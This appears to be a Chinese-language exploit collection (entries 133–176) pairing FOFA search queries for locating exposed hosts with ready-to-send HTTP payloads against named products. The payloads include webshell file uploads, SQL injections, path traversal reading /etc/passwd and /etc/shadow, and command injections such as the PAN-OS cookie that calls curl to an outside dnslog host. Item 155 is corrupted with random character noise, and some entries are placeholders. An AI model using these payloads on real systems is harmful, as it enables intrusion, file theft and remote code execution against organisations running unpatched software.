/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 云商城 file.php file upload
FOFA: body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 NS-ASG application security gateway: SQL injection in index.php
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway 6.3
FOFA: app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 NS-ASG application security gateway: SQL injection in list_ipAddressPolicy.php
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3
FOFA: app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA: title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立讯 communication command and dispatch platform: SQL injection in down_file.php
CVE-2024-2620
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command and dispatch platform: SQL injection in pwd_update.php
CVE-2024-2621
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command and dispatch platform: SQL injection in editemedia.php
CVE-2024-2622
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command and dispatch platform: SQL injection in get_extension_yl.php
CVE-2024-2566
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 communication command and dispatch management platform: SQL injection in ajax_users.php
FOFA: body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform: weak password
CVE-2024-29666
FOFA: body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA: title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA: app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA: icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA: app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA: body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA: body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard: remote command execution
FOFA: title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA: title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA: title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA: body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA: body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the contents of /etc/passwd written to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform: SQL injection
CVE-2024-3720
FOFA: body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

3 l% r% k; ~) a3 Z7 _. e* A155. 六零导航页 file.php 任意文件上传: t- f2 J, ?2 F, o/ ]9 u
CVE-2024-349822 T! V& C% U+ ^3 ^: y- R* K
FOFA:title=="上网导航 - LyLme Spage"7 F$ X0 l% F9 w1 O' k. [3 H
POST /include/file.php HTTP/1.1
" v2 Z: f- _. H& g1 LHost: x.x.x.x% t) X6 E' R, p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.01 J9 @. A$ y" m, C
Connection: close
' v, O% g+ P7 s% f4 k: {  X( Z' S% AContent-Length: 232  c# a& z) {, Z, b
Accept: application/json, text/javascript, */*; q=0.01
  r* C. U; q5 h2 eAccept-Encoding: gzip, deflate, br. K% n) V9 ^# }* g& {2 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 c5 M; _( Y7 G3 t& u/ o6 O' ?/ uContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
6 Q, ?  ?. n2 o  t: _% y3 SX-Requested-With: XMLHttpRequest
! o  m/ F' ]) s/ Q: v+ g+ }% c/ y0 O: `- U" V; v2 j
-----------------------------qttl7vemrsold314zg0f  K% d- B" P, X5 s$ B2 m
Content-Disposition: form-data; name="file"; filename="test.php"% O  O% I3 [) j- q& d; E' [) X
Content-Type: image/png2 |4 o7 i7 L! K* o- Y" f
% L4 c; L% C# ]6 K& y
<?php phpinfo();unlink(__FILE__);?>( _1 y* M# _" `5 s% c5 o" e0 P
-----------------------------qttl7vemrsold314zg0f--
$ Q( S$ u) }* S' q, _. D
) d) l0 V& Y. M9 m0 `
$ u/ D. l5 _* I3 H" v$ `) W& R访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
" s& C# e( s# H! B/ h" s4 K6 j1 r: z0 ~* {7 |) c) J7 t
156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特 CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical imaging archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field specifies the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information release system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (Lean Value Management System) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
